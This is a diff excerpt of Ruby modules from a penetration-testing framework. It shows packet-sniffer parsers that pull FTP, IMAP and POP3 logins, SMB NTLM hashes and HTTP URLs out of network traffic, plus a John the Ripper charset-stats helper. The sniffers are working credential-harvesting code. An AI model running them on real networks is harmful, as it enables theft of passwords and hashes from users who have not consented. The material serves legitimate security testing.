:login_pass => /^(230\s*[^\n]+)/i, :login_pass => /^(230\s*[^\n]+)/i,
:login_fail => /^(5\d\d\s*[^\n]+)/i, :login_fail => /^(5\d\d\s*[^\n]+)/i,
:bye => /^221/ :bye => /^221/
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us # We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21) return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "ftp" s[:sname] ||= "ftp"
self.sigs.each_key do |k| self.sigs.each_key do |k|
# There is only one pattern per run to test # There is only one pattern per run to test
matched = nil matched = nil
matches = nil matches = nil
if(pkt.payload =~ self.sigs[k]) if(pkt.payload =~ self.sigs[k])
matched = k matched = k
matches = $1 matches = $1
end end
case matched case matched
when :login_fail when :login_fail
if(s[:user] and s[:pass]) if(s[:user] and s[:pass])
report_auth_info(s.merge({:active => false})) report_auth_info(s.merge({:active => false}))
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}") print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
s[:pass] = "" s[:pass] = ""
return return
end end
when :login_pass when :login_pass
if(s[:user] and s[:pass]) if(s[:user] and s[:pass])
report_auth_info(s) report_auth_info(s)
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}") print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
# Remove it form the session objects so freeup memory # Remove it form the session objects so freeup memory
sessions.delete(s[:session]) sessions.delete(s[:session])
return return
end end
when :banner when :banner
# Because some ftp server send multiple banner we take only the first one and ignore the rest # Because some ftp server send multiple banner we take only the first one and ignore the rest
if not (s[:info]) if not (s[:info])
s[:info] = matches s[:info] = matches
report_service(s) report_service(s)
end end
when :bye when :bye
sessions.delete(s[:session]) sessions.delete(s[:session])
when nil when nil
# No matches, no saved state # No matches, no saved state
else else
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
end # end case matched end # end case matched
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end end

104
data/exploits/psnuffle/imap.rb
View File

@ -9,72 +9,72 @@
class SnifferIMAP < BaseProtocolParser class SnifferIMAP < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:banner => /^(\*\s+OK[^\n\r]*)/i, :banner => /^(\*\s+OK[^\n\r]*)/i,
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i, :login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i, :login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i, :login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i :login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us # We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143) return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "imap4" s[:sname] ||= "imap4"
self.sigs.each_key do |k| self.sigs.each_key do |k|
# There is only one pattern per run to test # There is only one pattern per run to test
matched = nil matched = nil
matches = nil matches = nil
if (pkt.payload =~ self.sigs[k]) if (pkt.payload =~ self.sigs[k])
matched = k matched = k
matches = [$1,$2] matches = [$1,$2]
end end
case matched case matched
when :banner when :banner
s[:info] = matches s[:info] = matches
report_service(s) report_service(s)
when :login_pass when :login_pass
report_auth_info(s) report_auth_info(s)
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})") print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup # Remove it form the session objects so freeup
sessions.delete(s[:session]) sessions.delete(s[:session])
when :login_fail when :login_fail
report_auth_info(s.merge({:active => false})) report_auth_info(s.merge({:active => false}))
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})") print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup # Remove it form the session objects so freeup
sessions.delete(s[:session]) sessions.delete(s[:session])
when :login_bad when :login_bad
report_auth_info(s.merge({:active => false})) report_auth_info(s.merge({:active => false}))
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})") print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup # Remove it form the session objects so freeup
sessions.delete(s[:session]) sessions.delete(s[:session])
when :login when :login
s[:user]=$1 s[:user]=$1
s[:pass]=$2 s[:pass]=$2
when nil when nil
# No matches, no saved state # No matches, no saved state
else else
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
end # end case matched end # end case matched
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end end

136
data/exploits/psnuffle/pop3.rb
View File

@ -6,83 +6,83 @@
# as unsuccessful logins... (Typos are common :-) ) # as unsuccessful logins... (Typos are common :-) )
# #
class SnifferPOP3 < BaseProtocolParser class SnifferPOP3 < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:ok => /^(\+OK[^\n]*)\n/i, :ok => /^(\+OK[^\n]*)\n/i,
:err => /^(\-ERR[^\n]*)\n/i, :err => /^(\-ERR[^\n]*)\n/i,
:user => /^USER\s+([^\n]+)\n/i, :user => /^USER\s+([^\n]+)\n/i,
:pass => /^PASS\s+([^\n]+)\n/i, :pass => /^PASS\s+([^\n]+)\n/i,
:quit => /^(QUIT\s*[^\n]*)\n/i :quit => /^(QUIT\s*[^\n]*)\n/i
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us # We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110) return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k| self.sigs.each_key do |k|
# There is only one pattern per run to test # There is only one pattern per run to test
matched = nil matched = nil
matches = nil matches = nil
if(pkt.payload =~ self.sigs[k]) if(pkt.payload =~ self.sigs[k])
matched = k matched = k
matches = $1 matches = $1
end end
case matched case matched
when :ok when :ok
# Last command was successful, in addition most servers transmit a banner with the first +OK # Last command was successful, in addition most servers transmit a banner with the first +OK
case s[:last] case s[:last]
when nil when nil
# Its the first +OK must include the banner, worst case its just +OK # Its the first +OK must include the banner, worst case its just +OK
s[:info] = matches s[:info] = matches
s[:proto] = "tcp" s[:proto] = "tcp"
s[:name] = "pop3" s[:name] = "pop3"
report_service(s) report_service(s)
when :user when :user
# When the last command was a username login # When the last command was a username login
# We might keep track on this one in future # We might keep track on this one in future
when :pass when :pass
# Perfect we get an +OK after a PASS command this means right password given :-) # Perfect we get an +OK after a PASS command this means right password given :-)
s[:proto] = "tcp" s[:proto] = "tcp"
s[:name] = "pop3" s[:name] = "pop3"
s[:extra] = "Successful Login. Banner: #{s[:banner]}" s[:extra] = "Successful Login. Banner: #{s[:banner]}"
report_auth_info(s) report_auth_info(s)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})") print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup # Remove it form the session objects so freeup
sessions.delete(s[:session]) sessions.delete(s[:session])
when :quit when :quit
# The session is terminated by the user just delete is as well # The session is terminated by the user just delete is as well
sessions.delete(s[:session]) sessions.delete(s[:session])
end end
s[:last]=:ok s[:last]=:ok
when :err when :err
case s[:last] case s[:last]
when :pass when :pass
# Oops got a -ERR after a pass so its crap ignore the pass # Oops got a -ERR after a pass so its crap ignore the pass
# But report it, might be helpfull for guessing :-) # But report it, might be helpfull for guessing :-)
s[:proto]="pop3" s[:proto]="pop3"
s[:extra]="Failed Login. Banner: #{s[:banner]}" s[:extra]="Failed Login. Banner: #{s[:banner]}"
report_auth_info(s) report_auth_info(s)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})") print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:pass]="" s[:pass]=""
end end
when nil when nil
# No matches, no saved state # No matches, no saved state
else else
s[:last]=matched s[:last]=matched
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
end # end case matched end # end case matched
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end end

354
data/exploits/psnuffle/smb.rb
View File

@ -6,206 +6,206 @@
#Memo : #Memo :
#FOR SMBV1 #FOR SMBV1
# Authentification without extended security set # Authentification without extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17 #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0) #3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok #4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
# Authentification with extended security set # Authentification with extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1 #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1 #2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message #3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge #4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes #5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok #6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
#FOR SMBV2 #FOR SMBV2
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response #SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
class SnifferSMB < BaseProtocolParser class SnifferSMB < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:smb1_negotiate => /\xffSMB\x72/n, :smb1_negotiate => /\xffSMB\x72/n,
:smb1_setupandx => /\xffSMB\x73/n, :smb1_setupandx => /\xffSMB\x73/n,
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n, #:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n :smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us # We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445) return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k| self.sigs.each_key do |k|
# There is only one pattern per run to test # There is only one pattern per run to test
matched = nil matched = nil
matches = nil matches = nil
if(pkt.payload =~ self.sigs[k]) if(pkt.payload =~ self.sigs[k])
matched = k matched = k
matches = $1 matches = $1
end end
case matched case matched
when :smb1_negotiate when :smb1_negotiate
payload = pkt.payload.dup payload = pkt.payload.dup
wordcount = payload[36,1].unpack("C")[0] wordcount = payload[36,1].unpack("C")[0]
#negotiate response #negotiate response
if wordcount == 17 if wordcount == 17
flags2 = payload[14,2].unpack("v")[0] flags2 = payload[14,2].unpack("v")[0]
#the server challenge is here #the server challenge is here
if flags2 & 0x800 == 0 if flags2 & 0x800 == 0
s[:challenge] = payload[73,8].unpack("H*")[0] s[:challenge] = payload[73,8].unpack("H*")[0]
s[:last] = :smb1_negotiate s[:last] = :smb1_negotiate
end end
end end
when :smb1_setupandx when :smb1_setupandx
s[:smb_version] = "SMBv1" s[:smb_version] = "SMBv1"
parse_sessionsetup(pkt, s) parse_sessionsetup(pkt, s)
when :smb2_setupandx when :smb2_setupandx
s[:smb_version] = "SMBv2" s[:smb_version] = "SMBv2"
parse_sessionsetup(pkt, s) parse_sessionsetup(pkt, s)
when nil when nil
# No matches, no saved state # No matches, no saved state
else else
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
end # end case matched end # end case matched
end # end of each_key end # end of each_key
end # end of parse end # end of parse
#ntlmv1, ntlmv2 or ntlm2_session #ntlmv1, ntlmv2 or ntlm2_session
def detect_ntlm_ver(lmhash, ntlmhash) def detect_ntlm_ver(lmhash, ntlmhash)
return "NTLMv2" if ntlmhash.length > 48 return "NTLMv2" if ntlmhash.length > 48
if lmhash.length == 48 and ntlmhash.length == 48 if lmhash.length == 48 and ntlmhash.length == 48
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16 if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
return "NTLM2_SESSION" return "NTLM2_SESSION"
else else
return "NTLMv1" return "NTLMv1"
end end
else else
raise RuntimeError, "Unknow hash type" raise RuntimeError, "Unknow hash type"
end end
end end
def parse_sessionsetup(pkt, s) def parse_sessionsetup(pkt, s)
payload = pkt.payload.dup payload = pkt.payload.dup
ntlmpayload = payload[/NTLMSSP\x00.*/m] ntlmpayload = payload[/NTLMSSP\x00.*/m]
if ntlmpayload if ntlmpayload
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0] ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
case ntlmmessagetype case ntlmmessagetype
when 2 # challenge when 2 # challenge
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0] s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
s[:last] = :ntlm_type2 s[:last] = :ntlm_type2
when 3 # auth when 3 # auth
if s[:last] == :ntlm_type2 if s[:last] == :ntlm_type2
lmlength = ntlmpayload[12, 2].unpack("v")[0] lmlength = ntlmpayload[12, 2].unpack("v")[0]
lmoffset = ntlmpayload[16, 2].unpack("v")[0] lmoffset = ntlmpayload[16, 2].unpack("v")[0]
ntlmlength = ntlmpayload[20, 2].unpack("v")[0] ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0] ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
domainlength = ntlmpayload[28, 2].unpack("v")[0] domainlength = ntlmpayload[28, 2].unpack("v")[0]
domainoffset = ntlmpayload[32, 2].unpack("v")[0] domainoffset = ntlmpayload[32, 2].unpack("v")[0]
usrlength = ntlmpayload[36, 2].unpack("v")[0] usrlength = ntlmpayload[36, 2].unpack("v")[0]
usroffset = ntlmpayload[40, 2].unpack("v")[0] usroffset = ntlmpayload[40, 2].unpack("v")[0]
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || '' s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || '' s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || '' s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || '' s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
secbloblength = payload[51,2].unpack("v")[0] secbloblength = payload[51,2].unpack("v")[0]
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') } names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:peer_os] = names[0] || '' s[:peer_os] = names[0] || ''
s[:peer_lm] = names[1] || '' s[:peer_lm] = names[1] || ''
s[:last] = :ntlm_type3 s[:last] = :ntlm_type3
end end
end end
else else
wordcount = payload[36,1].unpack("C")[0] wordcount = payload[36,1].unpack("C")[0]
#authentification without smb extended security (smbmount, msf server capture) #authentification without smb extended security (smbmount, msf server capture)
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1" if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
lmlength = payload[51,2].unpack("v")[0] lmlength = payload[51,2].unpack("v")[0]
ntlmlength = payload[53,2].unpack("v")[0] ntlmlength = payload[53,2].unpack("v")[0]
s[:lmhash] = payload[65,lmlength].unpack("H*")[0] s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0] s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') } names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:user] = names[0] s[:user] = names[0]
s[:domain] = names[1] s[:domain] = names[1]
s[:peer_os] = names[2] s[:peer_os] = names[2]
s[:peer_lm] = names[3] s[:peer_lm] = names[3]
s[:last] = :smb_no_ntlm s[:last] = :smb_no_ntlm
else else
#answer from server #answer from server
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
#do not output anonymous/guest logging #do not output anonymous/guest logging
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
#set lmhash to a default value if not provided #set lmhash to a default value if not provided
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash] s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
smb_status = payload[9,4].unpack("V")[0] smb_status = payload[9,4].unpack("V")[0]
if smb_status == 0 # success if smb_status == 0 # success
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash]) ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
logmessage = logmessage =
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" + "#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" + "USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
"SERVER CHALLENGE:#{s[:challenge]} " + "SERVER CHALLENGE:#{s[:challenge]} " +
"\nLMHASH:#{s[:lmhash]} " + "\nLMHASH:#{s[:lmhash]} " +
"\nNTHASH:#{s[:ntlmhash]}\n" "\nNTHASH:#{s[:ntlmhash]}\n"
print_status(logmessage) print_status(logmessage)
src_ip = s[:client_host] src_ip = s[:client_host]
dst_ip = s[:host] dst_ip = s[:host]
# know this is ugly , last code added :-/ # know this is ugly , last code added :-/
smb_db_type_hash = case ntlm_ver smb_db_type_hash = case ntlm_ver
when "NTLMv1" then "smb_netv1_hash" when "NTLMv1" then "smb_netv1_hash"
when "NTLM2_SESSION" then "smb_netv1_hash" when "NTLM2_SESSION" then "smb_netv1_hash"
when "NTLMv2" then "smb_netv2_hash" when "NTLMv2" then "smb_netv2_hash"
end end
# DB reporting # DB reporting
report_auth_info( report_auth_info(
:host => dst_ip, :host => dst_ip,
:port => 445, :port => 445,
:sname => 'smb', :sname => 'smb',
:user => s[:user], :user => s[:user],
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge], :pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
:type => smb_db_type_hash, :type => smb_db_type_hash,
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}", :proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
:active => true :active => true
) )
report_note( report_note(
:host => src_ip, :host => src_ip,
:type => "smb_peer_os", :type => "smb_peer_os",
:data => s[:peer_os] :data => s[:peer_os]
) if (s[:peer_os] and s[:peer_os].strip.length > 0) ) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note( report_note(
:host => src_ip, :host => src_ip,
:type => "smb_peer_lm", :type => "smb_peer_lm",
:data => s[:peer_lm] :data => s[:peer_lm]
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0) ) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note( report_note(
:host => src_ip, :host => src_ip,
:type => "smb_domain", :type => "smb_domain",
:data => s[:domain] :data => s[:domain]
) if (s[:domain] and s[:domain].strip.length > 0) ) if (s[:domain] and s[:domain].strip.length > 0)
end end
end end
end end
s[:last] = nil s[:last] = nil
sessions.delete(s[:session]) sessions.delete(s[:session])
end end
end end
end end
end end

66
data/exploits/psnuffle/url.rb
View File

@ -6,43 +6,43 @@
# Sniffer class for GET URL's # Sniffer class for GET URL's
class SnifferURL < BaseProtocolParser class SnifferURL < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i, :get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i, :webhost => /^HOST\:\s+([^\n\r]+)/i,
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us # We want to return immediantly if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80) return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k| self.sigs.each_key do |k|
# There is only one pattern per run to test # There is only one pattern per run to test
matched = nil matched = nil
matches = nil matches = nil
if(pkt.payload =~ self.sigs[k]) if(pkt.payload =~ self.sigs[k])
matched = k matched = k
matches = $1 matches = $1
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
end end
case matched case matched
when :webhost when :webhost
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
if(s[:get]) if(s[:get])
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}") print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session]) sessions.delete(s[:session])
return return
end end
when nil when nil
# No matches, no saved state # No matches, no saved state
end # end case matched end # end case matched
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end # end of URL sniffer end # end of URL sniffer

96
data/john/run.linux.x64.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.linux.x86.any/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
